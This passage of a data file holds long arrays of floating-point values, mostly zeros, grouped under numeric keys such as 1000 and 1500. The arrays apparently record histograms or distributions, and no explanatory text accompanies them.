0.0, 0.0, 0.0, 6.327695036091241e-05, 0.0, 7.281435966826725e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.103663822703146e-06, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.705572349438774e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.706720556810118e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.782012189552383e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.629364726915835e-05, 0.0, 6.026346729364631e-05, 0.0, 6.267194479645736e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.484162935582655e-05, 0.0, 0.0, 6.499001877596136e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.622530186364026e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.887506519715661e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.843484306081333e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.157049767171026e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.026723386968829e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
1000 : [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.569725232378688e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.179146554374504e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.890784851151843e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.797377707236985e-05, 0.0, 0.0, 3.6171102141786894e-05, 0.0, 0.0, 0.0, 4.11157026803288e-05, 4.158179585179559e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.847968352756976e-05, 3.789548002768657e-05, 4.1089112224669715e-05, 0.0, 0.0, 0.0, 0.0, 3.0755455630321896e-05, 0.0, 7.92642856714733e-05, 0.0, 0.0, 6.514547113225895e-05, 0.0, 0.0, 4.7487605162535624e-05, 3.7423427039982325e-05, 0.0, 0.00010872851798950443, 0.0001209798598169567, 0.00011056179827127914, 3.7824297904430876e-05, 1.7070779643211753e-05, 3.594517541382806e-05, 0.0, 0.0, 0.0, 8.362015114361684e-05, 7.21311589962697e-05, 6.758942360635078e-05, 8.565353776781808e-05, 3.7680061136970234e-05, 8.580901953366821e-05, 0.0, 0.00010938675023939395, 3.9911987636160644e-05, 3.629474117880568e-05, 3.682504635161159e-05, 6.447743858819212e-05, 0.00020220876550849112, 0.00014383771317187633, 0.00020386410035482053, 0.0001699109976319828, 7.440483382720406e-05, 0.00018317315851864565, 0.00022733281019234403, 7.838676772574377e-05, 0.00011417638897396618, 0.00032848853753683627, 8.464981388464723e-05, 0.00014812509505710583, 0.0001982845671240706, 0.00023103243769877248, 0.0002426768457940102, 0.00015442059605186447, 0.00028358552466436354, 0.0002802115117674317, 0.00023894817940382733, 0.0002774145907398534, 0.00035576165707239526, 0.00019766270587862961, 0.00019720327019377153, 0.00019175230576521082, 0.00023324439502903476, 0.00040973538520414456, 0.0005079115071925255, 0.00033450048159825216, 0.0003546062096288647, 0.00041398704110092913, 0.0006605489894113859, 0.00042212171966663837, 0.00043644465544381193, 0.00032385853368136185, 0.000906659663463969, 0.0003026308200578551, 0.0006164222072266879, 0.0007757231523249794, 0.000896074555936948, 0.0009943663595710379, 0.0006537444128266749, 0.0005153177652362787, 0.0007954750693322233, 0.0008010795475696435, 0.0006589618814619282, 0.0009738165182765509, 0.0011356444517867054, 0.0009614028298700672, 0.001040037073123727, 0.0008653693194097644, 0.00107311665305098, 0.0014199047421723978, 0.0007946199097473535, 0.0013993320488823544, 0.001103421031877307, 0.001776344587500019, 0.0016155125586994406, 0.001393706877478451, 0.0012358925757961566, 0.0016186074771206873, 0.0014241315188804717, 0.001687940642256638, 0.002044329202230176, 0.001660895779404806, 0.001772433210454119, 0.0017193302276000614, 0.0022150403487964346, 0.0021352694030541248, 0.002032976288714203, 0.0026497072084983742, 0.0023746252062450506, 0.0019669900458030324, 0.0021013269233499587, 0.0019312783793461036, 0.002694450152093216, 0.002353686249173691, 0.002651356343292914, 0.0031599160257511096, 0.002165495958725077, 0.002362769970061775, 0.0025763655716625924, 0.003167188647009788, 0.0036313619612508116, 0.0034880340345028508, 0.003209739273353498, 0.003422947549425942, 0.00360506215770111, 0.0030608249288162177, 0.0042089614187084574, 0.003648438825764384, 0.004312177037569463, 0.003683621210517778, 0.004107891149402648, 0.0045603096919938566, 0.004134766359881938, 0.004495319037866057, 0.00529680697271113, 0.004874303693169375, 0.005305818451806809, 0.004430437904822951, 0.004645665370585721, 0.005306837419129412, 0.005375234178991222, 0.004676667419783302, 0.0060485660165806275, 0.005892228459293214, 0.005864561748359533, 0.006567094855773171, 0.007211577575949132, 0.0074121603877484385, 0.007177233448728596, 0.007704455313401321, 0.008158367133858849, 0.007640580089397644, 0.00767318535878118, 0.008532802873032862, 0.008854880793963684, 0.00882606916646, 0.008983530157335417, 0.009629244568479255, 0.010804983741594124, 0.010092899553125213, 0.011848657335964661, 0.011746080730509357, 0.010863322253531536, 0.012601406703180766, 0.011094703236816912, 0.012917288258127504, 0.014027304670786883, 0.015773718620162094, 0.014339499577528817, 0.014911590545661255, 0.016351359779878914, 0.01615945862021638, 0.01735456280604506, 0.016750543914314433, 0.017808101412344745, 0.01814462769175646, 0.018378091260590805, 0.018517882288155534, 0.019291042173209347, 0.020345101736288482, 0.01766388067813905, 0.018058360460751984, 0.019040799974199753, 0.01732025069268005, 0.016677776420703415, 0.016646648843493376, 0.015928490447173316, 0.016537963488921746, 0.015245030015424342, 0.013990701039342102, 0.013144216788085096, 0.012822373073781545, 0.012277725562063989, 0.009182481104972771, 0.009070467994366182, 0.008541610895651974, 0.008266244559813386, 0.0071919362331139365, 0.007157719318845622, 0.005461793325809906, 0.004881893925573669, 0.005066270565482726, 0.005446520610549211, 0.0043814398564702445, 0.0036492084220018355, 0.0037872888144706196, 0.00332047204035651, 0.0031342154289051715, 0.0028024967038766165, 0.0027913506167167403, 0.002062547402816751, 0.0022577251384688956, 0.002671474945316415, 0.0021720981845749407, 0.0012922949866353817, 0.0010479756668243386, 0.0014188881969507063, 0.0016563017911367986, 0.0015073085703567913, 0.0013096677686951007, 0.001217598342302707, 0.0009192254176842021, 0.0008969372450963904, 0.0013706366822224241, 0.0010643283231653662, 0.0009700012881059649, 0.0012655137115479642, 0.000986513803107153, 0.0007792276690721114, 0.0007615312206144985, 0.0010824837597457123, 0.0006604434700586318, 0.000784815771801195, 0.0007062562450952187, 0.000619741222636618, 0.0007193015226415651, 0.0008113637880399595, 0.0005818601435784814, 0.00047504786282697125, 0.0003987374937619961, 0.0006530724904411985, 0.0007181514985979017, 0.0004452262192431839, 0.0008357501318695596, 0.0004425116759737811, 0.000683166462414429, 0.0001806816196597976, 0.0003515472278135334, 0.0005351316037798692, 0.0005157871789238049, 0.0005587095451030656, 0.0004873596650320682, 0.00015983393893474515, 0.0003472465507004744, 0.00042765672046595534, 0.0005150864019448609, 0.00022961542968398153, 0.0004003981335358654, 0.00040579515356477713, 0.00023716340695824256, 0.0005452180217909552, 0.0004099678279100991, 0.0003508768060775348, 0.00040079356783685494, 0.00017004448961754654, 0.0004319126676937027, 0.0002751630109979407, 0.00034473322609701455, 0.00037762901595401403, 0.00019358003101119933, 0.0002712819891949864, 0.0003047707988675511, 0.0003811019137533771, 0.00034603542126316266, 0.0002613167288838441, 0.000334602657398661, 0.00020025703922670626, 0.00018220580563992333, 0.0003336391351251846, 0.00023478961642903336, 0.0004093946587911348, 0.0001241551288032248, 0.0001536065726917149, 0.0003065682610157375, 0.00019184308189502518, 0.00025775534541965905, 0.00016673023942788805, 0.00012543971108339673, 0.00026145033934173504, 0.00018456826231649765, 0.0001985630560745278, 0.00021341781412847493, 0.00019612185479114526, 0.00019265278759702812, 4.582396408971071e-05, 0.0001933711379711726, 0.0003625183445097361, 7.386375754531744e-05, 0.00023264410891073498, 0.00011144475936226366, 7.532188203944065e-05, 0.00020490128608862773, 0.0003546465165472945, 0.0001202213868146692, 0.00030583457505701736, 0.00015418810069154232, 0.000199574520149742, 9.315899005841246e-05, 7.327489742479592e-05, 0.0002501246481338328, 0.00013939102549734671, 0.0001554608620661787, 0.00011083494280342073, 6.983621838260403e-05, 0.000235493394706933, 0.0001223351305856877, 0.0002730448574236322, 4.134488739728547e-05, 0.00013034607138743884, 0.0002777433909385923, 3.76171753675161e-05, 0.00014529338265610825, 0.0002622054293009015, 0.00011311566673782313, 0.0001737341391213069, 4.139993095685897e-05, 0.00012025565164441206, 0.0002697137051819607, 4.703618939604897e-05, 0.00012331039478314819, 0.0002138908346401846, 0.0001178918654450548, 0.0001958469463376877, 0.00015304636971078244, 4.155490263352257e-05, 0.00011884515960761677, 4.110292083258377e-05, 0.00015713484972224522, 0.00023133019814778659, 0.0001790176231699911, 7.282642043020328e-05, 0.00011436923559545409, 3.872192323680361e-06, 3.8458628362309014e-05, 6.328277680436036e-05, 7.693750891077223e-05, 3.9527199390128665e-05, 5.1873977258931604e-05, 0.00010143320269837233, 0.00012495302676328405, 0.0001327227579068683, 0.00015551246334646762, 0.0002051372171464385, 3.707096857568238e-05, 0.00010926314411135494, 7.534015310501233e-05, 4.138052782238298e-05, 3.760937923020714e-05, 7.688397916426844e-05, 0.00020198245703636686, 4.111046357074845e-05, 0.00017771412480824386, 3.8426581597803054e-05, 8.032618604909234e-05, 5.222943044039117e-05, 7.331967338267928e-05, 7.734639640269425e-05, 3.7032669105018964e-05, 4.7617812831917715e-05, 0.00010904561575503496, 7.345720659095953e-05, 6.5377834856662e-05, 0.00012286484668775561, 7.411741996143157e-05, 0.00011584769125728297, 7.523736519757968e-05, 3.639883228183746e-05, 3.666414447679233e-05, 5.529217375211086e-05, 8.29237971315547e-05, 0.00011138960391215893, 3.6495923644870876e-05, 3.846903089081624e-05, 9.6454712492457e-05, 0.0001454657204013997, 0.0, 4.301896390759738e-05, 3.594683731730675e-05, 8.054344455177815e-05, 5.7852275179424435e-05, 0.0, 4.426596084196706e-05, 0.00014216934636955558, 4.510719334659548e-05, 1.7227653458906414e-05, 3.672561186921812e-05, 0.00011561285277760076, 4.134005306815636e-05, 7.379867674691224e-05, 0.0, 5.455658894525764e-05, 4.770167149418316e-05, 9.757471696476871e-05, 4.181638093233352e-05, 8.756437135133314e-05, 3.6485037354360945e-05, 3.6505256631535376e-05, 8.483077378264001e-05, 6.162139328754809e-05, 4.140872752715312e-05, 9.747021120859175e-05, 7.692230496211568e-05, 0.0, 0.0, 4.531979522864298e-05, 0.0, 0.0, 3.7116336895201706e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.72982643171999e-05, 7.472385347715352e-05, 6.824635924243712e-05, 7.471151919153343e-05, 0.0001257987217255701, 4.788816997347226e-05, 7.856824758561702e-05, 4.606845477316125e-05, 0.0, 0.0, 0.0, 3.844980546483105e-05, 0.0, 3.6694888045699156e-05, 0.0, 4.410817215663462e-05, 4.3642125057739514e-05, 4.593602245674629e-05, 4.788816997347226e-05, 1.722929561699724e-05, 3.9527189517434734e-05, 0.0, 7.362726045305451e-05, 3.705441864975298e-05, 4.596516335833802e-05, 2.4837550624065165e-05, 3.822042000309774e-05, 0.0, 0.0, 4.9430791564068564e-05, 3.787962448123045e-05, 0.0, 3.730081805403053e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.86916469754096e-05, 3.847070924878482e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 4.714527937310874e-05, 0.00018071649001476835, 0.0, 3.8536885916216565e-05, 0.0, 0.0, 0.0, 3.916084346366928e-05, 0.0, 0.0, 4.227255862819378e-05, 0.0, 3.651878880401931e-05, 0.0, 0.0, 3.2349540283492056e-05, 4.275273026120878e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.8257431762845876e-05, 9.096388212579554e-05, 3.7209531835029625e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.183140059070333e-05, 0.0, 4.202578077064881e-05, 7.880863451928947e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.09273681155317e-06, 0.0, 0.0, 0.0, 0.0, 3.752448393507875e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.0390582929044375e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.962920406384265e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 3.561384451454437e-05, 0.0, 3.931269865994809e-05, 8.314555100087793e-05, 3.931269865994809e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.3395014819498805e-05, 4.227255862819378e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.579172316222407e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.814438380532507e-05, 3.814438380532507e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.227255862819378e-05, 0.0, 3.848892107819291e-05, 3.80915122384168e-05, 0.0, 0.0, 0.0, 0.0, 3.814438380532507e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.5339339871732e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.615668374794095e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8615008543307035e-05, 0.0, 0.0, 0.0, 0.0, 3.5660792465092944e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8615008543307035e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.930132860743545e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 4.227255862819378e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.1167106947983689e-06, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.0390582929044375e-05, 0.0, 3.788031556980574e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.814438380532507e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.788816997347226e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.0390582929044375e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.667602926067538e-05, 0.0, 3.75807977812716e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.418596337283539e-06, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.156173027702007e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.579172316222407e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
1500 : [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.350199889218441e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.999037130845309e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.279433983190236e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.002089305363262e-05, 5.7812366431008564e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00013930338106616294, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00010599333185304911, 0.0, 0.0, 0.0, 6.355944173604208e-05, 0.0, 0.0, 0.0, 0.00010125221568098062, 5.2892184938244875e-05, 6.175658065895123e-05, 5.200690943978667e-05, 0.0, 0.00010541696638697754, 7.151248621261196e-05, 0.00010900292578359963, 6.60129752541092e-05, 4.922511295854295e-05, 0.0, 0.0, 0.00012495253916761117, 0.00010663266989306221, 0.00015081764216559417, 7.237341220542173e-05, 5.7243075651294224e-05, 0.0002482847805951941, 0.00010044943541349184, 0.00010141788504787125, 0.0, 5.3774897984476556e-05, 5.790715646506808e-05, 0.00015835456344303326, 0.00010875106032581951, 4.9621899785541144e-05, 7.272771779696185e-05, 5.236285019874114e-05, 0.00016012748232795222, 8.805244884883592e-05, 0.0001560428920822369, 0.0001570003964441011, 0.00016133917863895566, 0.00015680323251091098, 0.00022098236957967241, 5.1319393986183536e-05, 0.00021622786573312805, 0.0002947469159865834, 0.00016226909627765744, 0.00024216370731535458, 0.00024055375873617655, 0.0002709809705408336, 0.00010164696579312348, 0.0003147247705053129, 0.0002741274962884258, 0.00027044846067878105, 0.00017037583407218207, 0.00023660215106772247, 0.00010819322399733422, 0.0003024071827027, 0.00021862597328534564, 0.00010274723061942022, 0.00026026728740746226, 0.00043949259785006897, 0.00021789355075298113, 0.00035565777150018167, 0.0006238488732143084, 0.0002828031233152238, 0.00042874950654122555, 0.00032437253974708163, 0.0001618715725904067, 0.0004044471268316288, 0.0005310559125843976, 0.0003952478653831234, 0.00031412789714210045, 0.00048208216004458533, 0.000535875475395711, 0.00032534791090023764, 0.0005240254047250111, 0.00035582590810701904, 0.00042930018125040246, 0.0005134307121034315, 0.0005722798491890884, 0.00046338534949388454, 0.0008149822758630057, 0.0009155726751266066, 0.0005077768578996726, 0.0006815315522408704, 0.0006213014231313575, 0.0006012363707229683, 0.0005836789613852355, 0.0006647927366884056, 0.0005980095520458355, 0.0005415042266749115, 0.0009128323498027219, 0.0007475668154477867, 0.0009539048409271945, 0.0012469837371232371, 0.0009571027813058908, 0.0009498203500334233, 0.0014500572564213599, 0.0010418476052296752, 0.001627633490177446, 0.0010332630673770167, 0.0008215824242175958, 0.0017105748776107964, 0.0013621719837772345, 0.0010693525948593438, 0.0009888959333148632, 0.0013530240541665462, 0.001666632572461881, 0.0014087065798532327, 0.001494815837143513, 0.001818124946797596, 0.0011835563962159519, 0.0021133909766924276, 0.0017287521768454726, 0.0023750998939269996, 0.002169059063229896, 0.0018771403990377807, 0.001926249932567948, 0.002121440338739198, 0.0017771065031307477, 0.0022056813820714506, 0.0021849471612018136, 0.0022492321080911076, 0.0019642524486178058, 0.002342223143380363, 0.0027596589472801067, 0.0026268505670942956, 0.0024217290730538404, 0.0022033205149396364, 0.0028283386943021055, 0.0030135892696330647, 0.0029035189727960146, 0.0036048371932977316, 0.0027552225518001124, 0.00260548751465274, 0.0031955161912586476, 0.0038446473524078257, 0.004130977006098405, 0.003952172119966178, 0.0037879621669006528, 0.003311664707570288, 0.00428139373005199, 0.004275682450424504, 0.004414714236392643, 0.003761094486875471, 0.004334076224432751, 0.003949886230434892, 0.004422285649353363, 0.0040058060085642385, 0.005048791855900866, 0.005282014583705223, 0.005031584099171956, 0.004804510594364951, 0.006798807203366696, 0.005496819315631512, 0.005988846174761653, 0.006591011154989392, 0.005641121258595055, 0.007575525866270585, 0.00539164402284871, 0.00617731707777606, 0.006664231153390349, 0.006817505504196559, 0.007899628864193155, 0.006902281060988405, 0.007562238139850542, 0.007981566399582689, 0.00905237688487067, 0.009808591955884639, 0.009154750187889579, 0.010459932704271986, 0.011045353570176905, 0.010243178024854938, 0.010532888294032212, 0.011914200363617686, 0.010721237325328448, 0.011592916841401183, 0.011605159120430121, 0.013517576480516241, 0.015533023131391257, 0.014906802793504424, 0.014403795822443983, 0.015298011008837908, 0.016788352696762644, 0.015435692138242474, 0.018485686609601783, 0.018395028887838494, 0.01716585299318691, 0.0211224140846384, 0.02191991293524476, 0.019883722658182727, 0.020925524495283458, 0.018804734050728338, 0.019995990884963163, 0.020539969008165033, 0.020182774659496437, 0.019120165610964423, 0.017951210241401082, 0.01752549431400559, 0.017070210188273333, 0.016427103729018157, 0.015151861384651464, 0.01383033640073917, 0.01351054819151694, 0.012862544608699376, 0.011024080066954356, 0.009939642204066554, 0.00988894674856904, 0.007814487162369757, 0.0076452465567288875, 0.006484790944692519, 0.0062629181829892645, 0.005718488074676088, 0.005645239462915211, 0.004281312128988518, 0.003847511867661913, 0.0027549131036113616, 0.003018602436266236, 0.002870209312711349, 0.0025402585918246454, 0.0022118423948328434, 0.0020911814456866097, 0.0019374998843785928, 0.001531385963097068, 0.0018503114000361922, 0.0017404697451399746, 0.0012755038386837265, 0.0019158889819536676, 0.0013621706590846456, 0.0017080696189867997, 0.0011446586529145625, 0.0010084403153012126, 0.0011455362617546628, 0.0011708629268912581, 0.0007275714418695699, 0.001042456301474243, 0.0007025364078064056, 0.0013295826915223747, 0.0005934944035914355, 0.0005232201572175757, 0.0007875045749006671, 0.0007430202717790314, 0.0004911552776413193, 0.0005077683136324746, 0.0006492040192415637, 0.000544391162351065, 0.00039713515491443047, 0.0005708744828215979, 0.00026595945834435305, 0.00022660343764185776, 0.00023007042308534548, 0.0007426552527361791, 0.0004562908589824575, 0.0003443203899786741, 0.0003396937024082945, 0.0003655384548163816, 0.0002666330148498014, 0.00031088064508178506, 0.0005710788828880545, 0.00042297765534511655, 0.00022465209922388067, 0.0004962218956204496, 0.0004784847917330419, 0.00023104889070742793, 0.0002104911023319657, 0.00013354298846094735, 0.00026392221361199033, 0.0003168210965271375, 0.0006310660633767758, 0.0005636291429416178, 0.00037561933230006853, 0.00018381119748125033, 0.00039527985670914363, 0.0002593263748202731, 0.00020681302712444782, 0.00028554450839317954, 0.00016801937154322586, 0.00015840947195084031, 0.00024782133689299165, 0.0002169422890049418, 0.00016723103042495536, 0.0001697601500742083, 0.0, 0.00015829538280162726, 0.00015717331850291556, 6.94656788556236e-05, 0.0006125119553352069, 0.00016658658403914656, 0.00016519969713327026, 0.0001409562165679044, 0.0002128044792344702, 0.0001587102930791064, 0.00016573541937485076, 0.00010330057127243217, 1.4652493029518053e-05, 5.191389118206472e-05, 